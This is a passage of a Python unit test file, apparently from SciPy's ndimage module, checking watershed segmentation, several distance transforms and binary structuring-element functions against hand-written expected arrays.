[-1, -1, 1, 1, 1, -1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, -1, 1, 1, 1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift03(self):
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 2, 0, 3, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1]], numpy.int8)
out = ndimage.watershed_ift(data, markers)
expected = [[-1, -1, -1, -1, -1, -1, -1],
[-1, -1, 2, -1, 3, -1, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, -1, 2, -1, 3, -1, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift04(self):
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 2, 0, 3, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1]],
numpy.int8)
out = ndimage.watershed_ift(data, markers,
structure=[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
expected = [[-1, -1, -1, -1, -1, -1, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, 2, 2, 3, 3, 3, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift05(self):
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 3, 0, 2, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1]],
numpy.int8)
out = ndimage.watershed_ift(data, markers,
structure=[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
expected = [[-1, -1, -1, -1, -1, -1, -1],
[-1, 3, 3, 2, 2, 2, -1],
[-1, 3, 3, 2, 2, 2, -1],
[-1, 3, 3, 2, 2, 2, -1],
[-1, 3, 3, 2, 2, 2, -1],
[-1, 3, 3, 2, 2, 2, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift06(self):
data = numpy.array([[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.int8)
out = ndimage.watershed_ift(data, markers,
structure=[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
expected = [[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift07(self):
shape = (7, 6)
data = numpy.zeros(shape, dtype=numpy.uint8)
data = data.transpose()
data[...] = numpy.array([[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.int8)
out = numpy.zeros(shape, dtype=numpy.int16)
out = out.transpose()
ndimage.watershed_ift(data, markers,
structure=[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
output=out)
expected = [[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_distance_transform_bf01(self):
# brute force (bf) distance transform
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_bf(data, 'euclidean',
return_indices=True)
expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 2, 4, 2, 1, 0, 0],
[0, 0, 1, 4, 8, 4, 1, 0, 0],
[0, 0, 1, 2, 4, 2, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
assert_array_almost_equal(out * out, expected)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 2, 1, 2, 2, 2, 2],
[3, 3, 3, 2, 1, 2, 3, 3, 3],
[4, 4, 4, 4, 6, 4, 4, 4, 4],
[5, 5, 6, 6, 7, 6, 6, 5, 5],
[6, 6, 6, 7, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 1, 2, 4, 6, 7, 7, 8],
[0, 1, 1, 1, 6, 7, 7, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_bf02(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_bf(data, 'cityblock',
return_indices=True)
expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 2, 2, 2, 1, 0, 0],
[0, 0, 1, 2, 3, 2, 1, 0, 0],
[0, 0, 1, 2, 2, 2, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
assert_array_almost_equal(out, expected)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 2, 1, 2, 2, 2, 2],
[3, 3, 3, 3, 1, 3, 3, 3, 3],
[4, 4, 4, 4, 7, 4, 4, 4, 4],
[5, 5, 6, 7, 7, 7, 6, 5, 5],
[6, 6, 6, 7, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 1, 1, 4, 7, 7, 7, 8],
[0, 1, 1, 1, 4, 7, 7, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(expected, ft)
def test_distance_transform_bf03(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_bf(data, 'chessboard',
return_indices=True)
expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 2, 1, 1, 0, 0],
[0, 0, 1, 2, 2, 2, 1, 0, 0],
[0, 0, 1, 1, 2, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
assert_array_almost_equal(out, expected)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 2, 1, 2, 2, 2, 2],
[3, 3, 4, 2, 2, 2, 4, 3, 3],
[4, 4, 5, 6, 6, 6, 5, 4, 4],
[5, 5, 6, 6, 7, 6, 6, 5, 5],
[6, 6, 6, 7, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 5, 6, 6, 7, 8],
[0, 1, 1, 2, 6, 6, 7, 7, 8],
[0, 1, 1, 2, 6, 7, 7, 7, 8],
[0, 1, 2, 2, 6, 6, 7, 7, 8],
[0, 1, 2, 4, 5, 6, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_bf04(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
tdt, tft = ndimage.distance_transform_bf(data, return_indices=1)
dts = []
fts = []
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ndimage.distance_transform_bf(data, distances=dt)
dts.append(dt)
ft = ndimage.distance_transform_bf(
data, return_distances=False, return_indices=1)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_bf(
data, return_distances=False, return_indices=True, indices=ft)
fts.append(ft)
dt, ft = ndimage.distance_transform_bf(
data, return_indices=1)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ft = ndimage.distance_transform_bf(
data, distances=dt, return_indices=True)
dts.append(dt)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
dt = ndimage.distance_transform_bf(
data, return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_bf(
data, distances=dt, return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
for dt in dts:
assert_array_almost_equal(tdt, dt)
for ft in fts:
assert_array_almost_equal(tft, ft)
def test_distance_transform_bf05(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_bf(
data, 'euclidean', return_indices=True, sampling=[2, 2])
expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 4, 4, 0, 0, 0],
[0, 0, 4, 8, 16, 8, 4, 0, 0],
[0, 0, 4, 16, 32, 16, 4, 0, 0],
[0, 0, 4, 8, 16, 8, 4, 0, 0],
[0, 0, 0, 4, 4, 4, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
assert_array_almost_equal(out * out, expected)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 2, 1, 2, 2, 2, 2],
[3, 3, 3, 2, 1, 2, 3, 3, 3],
[4, 4, 4, 4, 6, 4, 4, 4, 4],
[5, 5, 6, 6, 7, 6, 6, 5, 5],
[6, 6, 6, 7, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 1, 2, 4, 6, 7, 7, 8],
[0, 1, 1, 1, 6, 7, 7, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_bf06(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_bf(
data, 'euclidean', return_indices=True, sampling=[2, 1])
expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 4, 1, 0, 0, 0],
[0, 0, 1, 4, 8, 4, 1, 0, 0],
[0, 0, 1, 4, 9, 4, 1, 0, 0],
[0, 0, 1, 4, 8, 4, 1, 0, 0],
[0, 0, 0, 1, 4, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
assert_array_almost_equal(out * out, expected)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 2, 2, 2, 2, 2, 2],
[3, 3, 3, 3, 2, 3, 3, 3, 3],
[4, 4, 4, 4, 4, 4, 4, 4, 4],
[5, 5, 5, 5, 6, 5, 5, 5, 5],
[6, 6, 6, 6, 7, 6, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 6, 6, 6, 7, 8],
[0, 1, 1, 1, 6, 7, 7, 7, 8],
[0, 1, 1, 1, 7, 7, 7, 7, 8],
[0, 1, 1, 1, 6, 7, 7, 7, 8],
[0, 1, 2, 2, 4, 6, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_cdt01(self):
# chamfer type distance (cdt) transform
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_cdt(
data, 'cityblock', return_indices=True)
bf = ndimage.distance_transform_bf(data, 'cityblock')
assert_array_almost_equal(bf, out)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 1, 1, 1, 2, 2, 2],
[3, 3, 2, 1, 1, 1, 2, 3, 3],
[4, 4, 4, 4, 1, 4, 4, 4, 4],
[5, 5, 5, 5, 7, 7, 6, 5, 5],
[6, 6, 6, 6, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 1, 1, 4, 7, 7, 7, 8],
[0, 1, 1, 1, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_cdt02(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_cdt(data, 'chessboard',
return_indices=True)
bf = ndimage.distance_transform_bf(data, 'chessboard')
assert_array_almost_equal(bf, out)
expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 1, 1, 1, 2, 2, 2],
[3, 3, 2, 2, 1, 2, 2, 3, 3],
[4, 4, 3, 2, 2, 2, 3, 4, 4],
[5, 5, 4, 6, 7, 6, 4, 5, 5],
[6, 6, 6, 6, 7, 7, 6, 6, 6],
[7, 7, 7, 7, 7, 7, 7, 7, 7],
[8, 8, 8, 8, 8, 8, 8, 8, 8]],
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 2, 3, 4, 6, 7, 8],
[0, 1, 1, 2, 2, 6, 6, 7, 8],
[0, 1, 1, 1, 2, 6, 7, 7, 8],
[0, 1, 1, 2, 6, 6, 7, 7, 8],
[0, 1, 2, 2, 5, 6, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8],
[0, 1, 2, 3, 4, 5, 6, 7, 8]]]
assert_array_almost_equal(ft, expected)
def test_distance_transform_cdt03(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
tdt, tft = ndimage.distance_transform_cdt(data, return_indices=True)
dts = []
fts = []
dt = numpy.zeros(data.shape, dtype=numpy.int32)
ndimage.distance_transform_cdt(data, distances=dt)
dts.append(dt)
ft = ndimage.distance_transform_cdt(
data, return_distances=False, return_indices=True)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_cdt(
data, return_distances=False, return_indices=True, indices=ft)
fts.append(ft)
dt, ft = ndimage.distance_transform_cdt(
data, return_indices=True)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.int32)
ft = ndimage.distance_transform_cdt(
data, distances=dt, return_indices=True)
dts.append(dt)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
dt = ndimage.distance_transform_cdt(
data, return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.int32)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_cdt(data, distances=dt,
return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
for dt in dts:
assert_array_almost_equal(tdt, dt)
for ft in fts:
assert_array_almost_equal(tft, ft)
def test_distance_transform_edt01(self):
# euclidean distance transform (edt)
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
out, ft = ndimage.distance_transform_edt(data, return_indices=True)
bf = ndimage.distance_transform_bf(data, 'euclidean')
assert_array_almost_equal(bf, out)
dt = ft - numpy.indices(ft.shape[1:], dtype=ft.dtype)
dt = dt.astype(numpy.float64)
numpy.multiply(dt, dt, dt)
dt = numpy.add.reduce(dt, axis=0)
numpy.sqrt(dt, dt)
assert_array_almost_equal(bf, dt)
def test_distance_transform_edt02(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
tdt, tft = ndimage.distance_transform_edt(data, return_indices=True)
dts = []
fts = []
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ndimage.distance_transform_edt(data, distances=dt)
dts.append(dt)
ft = ndimage.distance_transform_edt(
data, return_distances=0, return_indices=True)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_edt(
data, return_distances=False, return_indices=True, indices=ft)
fts.append(ft)
dt, ft = ndimage.distance_transform_edt(
data, return_indices=True)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ft = ndimage.distance_transform_edt(
data, distances=dt, return_indices=True)
dts.append(dt)
fts.append(ft)
ft = numpy.indices(data.shape, dtype=numpy.int32)
dt = ndimage.distance_transform_edt(
data, return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
dt = numpy.zeros(data.shape, dtype=numpy.float64)
ft = numpy.indices(data.shape, dtype=numpy.int32)
ndimage.distance_transform_edt(
data, distances=dt, return_indices=True, indices=ft)
dts.append(dt)
fts.append(ft)
for dt in dts:
assert_array_almost_equal(tdt, dt)
for ft in fts:
assert_array_almost_equal(tft, ft)
def test_distance_transform_edt03(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
ref = ndimage.distance_transform_bf(data, 'euclidean', sampling=[2, 2])
out = ndimage.distance_transform_edt(data, sampling=[2, 2])
assert_array_almost_equal(ref, out)
def test_distance_transform_edt4(self):
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
ref = ndimage.distance_transform_bf(data, 'euclidean', sampling=[2, 1])
out = ndimage.distance_transform_edt(data, sampling=[2, 1])
assert_array_almost_equal(ref, out)
def test_distance_transform_edt5(self):
# Ticket #954 regression test
out = ndimage.distance_transform_edt(False)
assert_array_almost_equal(out, [0.])
def test_generate_structure01(self):
struct = ndimage.generate_binary_structure(0, 1)
assert_array_almost_equal(struct, 1)
def test_generate_structure02(self):
struct = ndimage.generate_binary_structure(1, 1)
assert_array_almost_equal(struct, [1, 1, 1])
def test_generate_structure03(self):
struct = ndimage.generate_binary_structure(2, 1)
assert_array_almost_equal(struct, [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
def test_generate_structure04(self):
struct = ndimage.generate_binary_structure(2, 2)
assert_array_almost_equal(struct, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_iterate_structure01(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
out = ndimage.iterate_structure(struct, 2)
assert_array_almost_equal(out, [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0]])
